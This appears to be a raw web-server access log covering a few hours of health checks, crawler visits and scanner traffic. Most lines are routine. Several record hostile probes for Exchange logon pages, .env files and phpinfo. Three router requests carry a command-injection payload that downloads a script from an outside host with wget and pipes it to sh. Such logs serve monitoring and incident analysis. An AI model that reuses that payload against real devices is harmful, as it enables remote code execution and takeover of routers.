91.242.162.6 - - [02/Sep/2024:11:38:27 +0200] "GET /robots.txt HTTP/1.1" 404 286 "-" "Mozilla/5.0 (compatible; Qwantbot-prod/1.0; +Qwantbot@qwant.com)"
91.242.162.8 - - [02/Sep/2024:11:38:27 +0200] "GET /robots.txt HTTP/1.1" 404 286 "-" "Mozilla/5.0 (compatible; Qwantbot-prod/1.0; +Qwantbot@qwant.com)"
91.242.162.9 - - [02/Sep/2024:11:38:35 +0200] "GET / HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Qwantbot-prod79845/1.0; +Qwantbot@qwant.com)"
91.242.162.9 - - [02/Sep/2024:11:38:44 +0200] "GET /fooldal.php3 HTTP/1.1" 404 288 "-" "Mozilla/5.0 (compatible; Qwantbot-prod79845/1.0; +Qwantbot@qwant.com)"
149.50.103.48 - - [02/Sep/2024:11:39:36 +0200] "GET / HTTP/1.1" 200 1155 "-" "-"
195.56.55.225 - - [02/Sep/2024:11:40:07 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/Sep/2024:11:42:11 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
212.95.49.158 - - [02/Sep/2024:11:43:18 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.3part.zpok.hu/owa/ HTTP/1.1" 404 299 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.95.49.158 - - [02/Sep/2024:11:43:18 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.mail.zpok.hu/owa/ HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
195.56.55.225 - - [02/Sep/2024:11:44:15 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
212.95.49.158 - - [02/Sep/2024:11:44:57 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.zpok.hu/owa/ HTTP/1.1" 404 293 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.95.49.158 - - [02/Sep/2024:11:44:57 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.mail.zpok.hu/owa/ HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.95.49.158 - - [02/Sep/2024:11:45:31 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.zpok.hu/owa/ HTTP/1.1" 404 293 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.95.49.158 - - [02/Sep/2024:11:45:32 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.mail.zpok.hu/owa/ HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.95.49.158 - - [02/Sep/2024:11:46:12 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.bush.zpok.hu/owa/ HTTP/1.1" 404 298 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.95.49.158 - - [02/Sep/2024:11:46:12 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.mail.zpok.hu/owa/ HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
195.56.55.225 - - [02/Sep/2024:11:46:18 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
188.187.48.82 - - [02/Sep/2024:11:47:18 +0200] "GET /new/\t\t\t\t\tHungary\t0.0.0.0 HTTP/1.1" 400 365 "-" "-"
195.56.55.225 - - [02/Sep/2024:11:48:26 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
45.148.10.251 - - [02/Sep/2024:11:49:23 +0200] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 302 "-" "Hello"
173.252.83.59 - - [02/Sep/2024:11:49:54 +0200] "GET /robots.txt HTTP/1.1" 404 295 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)"
45.148.10.251 - - [02/Sep/2024:11:50:04 +0200] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 302 "-" "Hello"
195.56.55.225 - - [02/Sep/2024:11:50:29 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
89.190.156.137 - - [02/Sep/2024:11:51:32 +0200] "GET / HTTP/1.0" 200 1155 "-" "ivre-masscan/1.3 https://github.com/robertdavidgraham/"
34.65.136.163 - - [02/Sep/2024:11:51:33 +0200] "\x16\x03\x01" 501 - "-" "-"
34.65.136.163 - - [02/Sep/2024:11:51:35 +0200] "OPTIONS / HTTP/1.0" 200 - "-" "-"
195.56.55.225 - - [02/Sep/2024:11:52:32 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/Sep/2024:11:54:36 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
212.95.49.158 - - [02/Sep/2024:11:54:38 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.zpok.hu/owa/ HTTP/1.1" 404 293 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.95.49.158 - - [02/Sep/2024:11:54:38 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.mail.zpok.hu/owa/ HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
185.191.126.213 - - [02/Sep/2024:11:56:08 +0200] "GET / HTTP/1.1" 200 1155 "-" "-"
195.56.55.225 - - [02/Sep/2024:11:56:39 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
178.211.139.188 - - [02/Sep/2024:11:56:44 +0200] "GET / HTTP/1.1" 200 1155 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
52.53.156.71 - - [02/Sep/2024:11:56:48 +0200] "GET / HTTP/1.1" 200 1155 "-" "bitdiscovery-suggestions"
35.247.65.40 - - [02/Sep/2024:11:56:54 +0200] "\x16\x03\x01" 501 - "-" "-"
35.247.65.40 - - [02/Sep/2024:11:56:57 +0200] "OPTIONS / HTTP/1.0" 200 - "-" "-"
195.56.55.225 - - [02/Sep/2024:11:58:42 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/Sep/2024:12:00:45 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/Sep/2024:12:02:48 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/Sep/2024:12:04:51 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
54.67.45.97 - - [02/Sep/2024:12:05:43 +0200] "GET / HTTP/1.1" 200 1155 "-" "bitdiscovery-suggestions"
185.224.128.47 - - [02/Sep/2024:12:05:48 +0200] "GET / HTTP/1.0" 200 1155 "-" "ivre-masscan/1.3 https://github.com/robertdavidgraham/"
195.56.55.225 - - [02/Sep/2024:12:06:54 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
185.224.128.59 - - [02/Sep/2024:12:07:03 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.17.171%3A88%2Ft%7Csh%3B%60) HTTP/1.1" 404 302 "-" "Go-http-client/1.1"
195.56.55.225 - - [02/Sep/2024:12:08:58 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
3.101.230.238 - - [02/Sep/2024:12:09:13 +0200] "HEAD / HTTP/1.1" 200 0 "-" "bitdiscovery"
195.56.55.225 - - [02/Sep/2024:12:11:02 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
95.214.55.138 - - [02/Sep/2024:12:12:33 +0200] "GET / HTTP/1.1" 200 1155 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
195.56.55.225 - - [02/Sep/2024:12:13:05 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
5.62.49.83 - - [02/Sep/2024:12:13:39 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.zpok.hu/owa/ HTTP/1.1" 404 293 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
5.62.49.83 - - [02/Sep/2024:12:13:46 +0200] "GET / HTTP/1.1" 200 1155 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
5.62.49.83 - - [02/Sep/2024:12:13:48 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.mail.zpok.hu/owa/ HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
5.62.49.83 - - [02/Sep/2024:12:13:50 +0200] "GET / HTTP/1.1" 200 1155 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
195.56.55.225 - - [02/Sep/2024:12:15:08 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/Sep/2024:12:17:12 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
149.50.103.48 - - [02/Sep/2024:12:18:12 +0200] "GET / HTTP/1.1" 200 1155 "-" "-"
195.56.55.225 - - [02/Sep/2024:12:19:16 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/Sep/2024:12:21:19 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
45.148.10.251 - - [02/Sep/2024:12:21:22 +0200] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 302 "-" "Hello"
195.56.55.225 - - [02/Sep/2024:12:23:22 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
102.134.18.194 - - [02/Sep/2024:12:23:24 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.zpok.hu/owa/ HTTP/1.1" 404 293 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
102.134.18.194 - - [02/Sep/2024:12:23:41 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.mail.zpok.hu/owa/ HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
195.56.55.225 - - [02/Sep/2024:12:25:27 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/Sep/2024:12:27:30 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/Sep/2024:12:29:33 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/Sep/2024:12:31:36 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/Sep/2024:12:33:39 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
64.62.156.120 - - [02/Sep/2024:12:34:08 +0200] "\x16\x03\x01" 501 - "-" "-"
195.56.55.225 - - [02/Sep/2024:12:35:42 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
185.191.126.213 - - [02/Sep/2024:12:36:06 +0200] "GET / HTTP/1.1" 200 1155 "-" "-"
195.56.55.225 - - [02/Sep/2024:12:37:45 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
95.214.55.138 - - [02/Sep/2024:12:39:38 +0200] "GET / HTTP/1.1" 200 1155 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
195.56.55.225 - - [02/Sep/2024:12:39:48 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/Sep/2024:12:41:52 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
95.214.52.167 - - [02/Sep/2024:12:42:22 +0200] "GET / HTTP/1.1" 200 1155 "-" "-"
91.242.162.7 - - [02/Sep/2024:12:42:36 +0200] "GET /robots.txt HTTP/1.1" 404 283 "-" "Mozilla/5.0 (compatible; Qwantbot-prod/1.0; +Qwantbot@qwant.com)"
91.242.162.9 - - [02/Sep/2024:12:42:57 +0200] "GET /maxigas/pick/text.html HTTP/1.1" 404 295 "-" "Mozilla/5.0 (compatible; Qwantbot-prod79845/1.0; +Qwantbot@qwant.com)"
195.56.55.225 - - [02/Sep/2024:12:43:55 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
91.233.21.70 - - [02/Sep/2024:12:44:05 +0200] "GET /.well-known/acme-challenge/574MJWF2PJ3GSGB73ZOMW696NT4U0K9R HTTP/1.1" 404 335 "-" "Cpanel-HTTP-Client/1.0"
91.233.21.70 - - [02/Sep/2024:12:44:05 +0200] "GET /.well-known/acme-challenge/AJEWF8KV0K7HDD16ZK038FTCUSJ-1I6W HTTP/1.1" 404 337 "-" "Cpanel-HTTP-Client/1.0"
91.233.21.70 - - [02/Sep/2024:12:44:05 +0200] "GET /.well-known/acme-challenge/2OZTKV311FT08-WFXRV4HASQX2_4AH4U HTTP/1.1" 404 338 "-" "Cpanel-HTTP-Client/1.0"
91.233.21.70 - - [02/Sep/2024:12:44:05 +0200] "GET /.well-known/acme-challenge/5BTEA8ZME5RTDBJQO7AV-K6A7YF5O92O HTTP/1.1" 404 338 "-" "Cpanel-HTTP-Client/1.0"
91.233.21.70 - - [02/Sep/2024:12:44:06 +0200] "GET /.well-known/acme-challenge/Q2QT7PX46LIQNSYD23FF-E2IT7PODV0E HTTP/1.1" 404 341 "-" "Cpanel-HTTP-Client/1.0"
91.233.21.70 - - [02/Sep/2024:12:44:06 +0200] "GET /.well-known/acme-challenge/IK3R3EKTDZX5TALKFNSN_E6OXJH2UTPU HTTP/1.1" 404 342 "-" "Cpanel-HTTP-Client/1.0"
195.56.55.225 - - [02/Sep/2024:12:45:59 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/Sep/2024:12:48:02 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/Sep/2024:12:50:05 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/Sep/2024:12:52:09 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
35.233.3.99 - - [02/Sep/2024:12:53:40 +0200] "GET / HTTP/1.1" 200 1155 "-" "python-requests/2.32.2"
195.56.55.225 - - [02/Sep/2024:12:54:12 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/Sep/2024:12:56:16 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
34.79.160.230 - - [02/Sep/2024:12:56:38 +0200] "GET / HTTP/1.1" 200 1155 "-" "python-requests/2.32.2"
149.50.103.48 - - [02/Sep/2024:12:57:21 +0200] "GET / HTTP/1.1" 200 1155 "-" "-"
195.56.55.225 - - [02/Sep/2024:12:58:19 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/Sep/2024:13:00:22 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/Sep/2024:13:02:25 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/Sep/2024:13:04:28 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/Sep/2024:13:06:32 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/Sep/2024:13:08:36 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
37.107.18.250 - - [02/Sep/2024:13:10:15 +0200] "GET / HTTP/1.1" 200 1155 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
195.56.55.225 - - [02/Sep/2024:13:10:39 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
212.95.49.158 - - [02/Sep/2024:13:12:30 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.zpok.hu/owa/ HTTP/1.1" 404 293 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.95.49.158 - - [02/Sep/2024:13:12:30 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.mail.zpok.hu/owa/ HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
195.56.55.225 - - [02/Sep/2024:13:12:43 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
205.210.31.18 - - [02/Sep/2024:13:14:44 +0200] "GET / HTTP/1.1" 200 1155 "-" "-"
195.56.55.225 - - [02/Sep/2024:13:14:46 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/Sep/2024:13:16:49 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/Sep/2024:13:18:52 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
149.50.103.48 - - [02/Sep/2024:13:19:27 +0200] "GET / HTTP/1.1" 200 1155 "-" "-"
195.56.55.225 - - [02/Sep/2024:13:20:55 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/Sep/2024:13:22:58 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
5.8.11.202 - - [02/Sep/2024:13:24:15 +0200] "\x16\x03\x02\x01o\x01" 501 - "-" "-"
205.210.31.165 - - [02/Sep/2024:13:24:45 +0200] "GET / HTTP/1.1" 200 1155 "-" "-"
195.56.55.225 - - [02/Sep/2024:13:25:02 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
89.190.156.137 - - [02/Sep/2024:13:26:28 +0200] "GET / HTTP/1.0" 200 1155 "-" "ivre-masscan/1.3 https://github.com/robertdavidgraham/"
195.56.55.225 - - [02/Sep/2024:13:27:09 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
206.168.34.42 - - [02/Sep/2024:13:27:57 +0200] "GET / HTTP/1.1" 200 1155 "-" "-"
206.168.34.42 - - [02/Sep/2024:13:28:02 +0200] "GET / HTTP/1.1" 200 1155 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
206.168.34.42 - - [02/Sep/2024:13:28:03 +0200] "GET /favicon.ico HTTP/1.1" 404 287 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
206.168.34.42 - - [02/Sep/2024:13:28:03 +0200] "PRI * HTTP/2.0" 400 373 "-" "-"
5.8.11.202 - - [02/Sep/2024:13:28:44 +0200] "GET / HTTP/1.0" 200 1155 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.108 Safari/537.36"
195.56.55.225 - - [02/Sep/2024:13:29:12 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
185.191.126.213 - - [02/Sep/2024:13:30:17 +0200] "GET / HTTP/1.1" 200 1155 "-" "-"
195.56.55.225 - - [02/Sep/2024:13:31:15 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/Sep/2024:13:33:18 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/Sep/2024:13:35:21 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
212.95.49.158 - - [02/Sep/2024:13:36:37 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.zpok.hu/owa/ HTTP/1.1" 404 293 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.95.49.158 - - [02/Sep/2024:13:36:38 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.mail.zpok.hu/owa/ HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
195.56.55.225 - - [02/Sep/2024:13:37:24 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
66.249.89.13 - - [02/Sep/2024:13:38:05 +0200] "GET / HTTP/1.1" 200 1155 "-" "FeedFetcher-Google; (+http://www.google.com/feedfetcher.html)"
198.235.24.172 - - [02/Sep/2024:13:39:12 +0200] "GET / HTTP/1.1" 200 1155 "-" "-"
195.56.55.225 - - [02/Sep/2024:13:39:27 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/Sep/2024:13:41:30 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/Sep/2024:13:43:33 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
185.224.128.59 - - [02/Sep/2024:13:43:38 +0200] "GET / HTTP/1.1" 200 1155 "-" "-"
195.56.55.225 - - [02/Sep/2024:13:45:38 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
212.95.49.158 - - [02/Sep/2024:13:47:08 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.zpok.hu/owa/ HTTP/1.1" 404 293 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.95.49.158 - - [02/Sep/2024:13:47:08 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.mail.zpok.hu/owa/ HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
195.56.55.225 - - [02/Sep/2024:13:47:41 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
45.148.10.251 - - [02/Sep/2024:13:48:14 +0200] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 302 "-" "Hello"
195.56.55.225 - - [02/Sep/2024:13:49:44 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
185.16.39.118 - - [02/Sep/2024:13:51:34 +0200] "GET / HTTP/1.1" 200 1155 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
195.56.55.225 - - [02/Sep/2024:13:51:47 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
198.235.24.18 - - [02/Sep/2024:13:53:43 +0200] "GET / HTTP/1.1" 200 1155 "-" "-"
195.56.55.225 - - [02/Sep/2024:13:53:50 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
185.191.126.213 - - [02/Sep/2024:13:53:59 +0200] "GET / HTTP/1.1" 200 1155 "-" "-"
212.95.49.158 - - [02/Sep/2024:13:54:12 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.zpok.hu/owa/ HTTP/1.1" 404 293 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.95.49.158 - - [02/Sep/2024:13:54:12 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.mail.zpok.hu/owa/ HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.95.49.158 - - [02/Sep/2024:13:54:52 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.zpok.hu/owa/ HTTP/1.1" 404 293 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.95.49.158 - - [02/Sep/2024:13:54:52 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.mail.zpok.hu/owa/ HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
195.56.55.225 - - [02/Sep/2024:13:55:53 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
92.249.235.235 - - [02/Sep/2024:13:56:02 +0200] "-" 408 - "-" "-"
71.6.232.27 - - [02/Sep/2024:13:56:10 +0200] "GET / HTTP/1.1" 200 1155 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36"
195.56.55.225 - - [02/Sep/2024:13:57:56 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
91.92.249.4 - - [02/Sep/2024:13:59:01 +0200] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0 (Linux; Android 12; Pixel 6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Mobile Safari/537.36"
89.190.156.137 - - [02/Sep/2024:13:59:11 +0200] "GET / HTTP/1.0" 200 1155 "-" "ivre-masscan/1.3 https://github.com/robertdavidgraham/"
195.56.55.225 - - [02/Sep/2024:13:59:59 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
91.92.249.4 - - [02/Sep/2024:14:00:46 +0200] "GET /_profiler/phpinfo HTTP/1.1" 404 293 "-" "Mozilla/5.0 (X11; FreeBSD amd64; rv:54.0) Gecko/20100101 Firefox/54.0"
195.56.55.225 - - [02/Sep/2024:14:02:02 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/Sep/2024:14:04:05 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/Sep/2024:14:06:08 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/Sep/2024:14:08:11 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/Sep/2024:14:10:14 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/Sep/2024:14:12:18 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
185.224.128.84 - - [02/Sep/2024:14:13:48 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.17.171%3A88%2Ft%7Csh%3B%60) HTTP/1.1" 404 302 "-" "Go-http-client/1.1"
195.56.55.225 - - [02/Sep/2024:14:14:21 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
185.224.128.84 - - [02/Sep/2024:14:15:26 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.17.171%3A88%2Ft%7Csh%3B%60) HTTP/1.1" 404 302 "-" "Go-http-client/1.1"
195.56.55.225 - - [02/Sep/2024:14:16:24 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/Sep/2024:14:18:27 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/Sep/2024:14:20:30 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
54.183.177.214 - - [02/Sep/2024:14:21:59 +0200] "GET / HTTP/1.1" 200 1155 "-" "bitdiscovery-suggestions"
195.56.55.225 - - [02/Sep/2024:14:22:33 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/Sep/2024:14:24:37 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
212.95.49.158 - - [02/Sep/2024:14:24:46 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.mdem.zpok.hu/owa/ HTTP/1.1" 404 298 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.95.49.158 - - [02/Sep/2024:14:24:46 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.mail.zpok.hu/owa/ HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
141.98.11.173 - - [02/Sep/2024:14:25:05 +0200] "GET / HTTP/1.1" 200 1155 "-" "-"
195.56.55.225 - - [02/Sep/2024:14:26:40 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
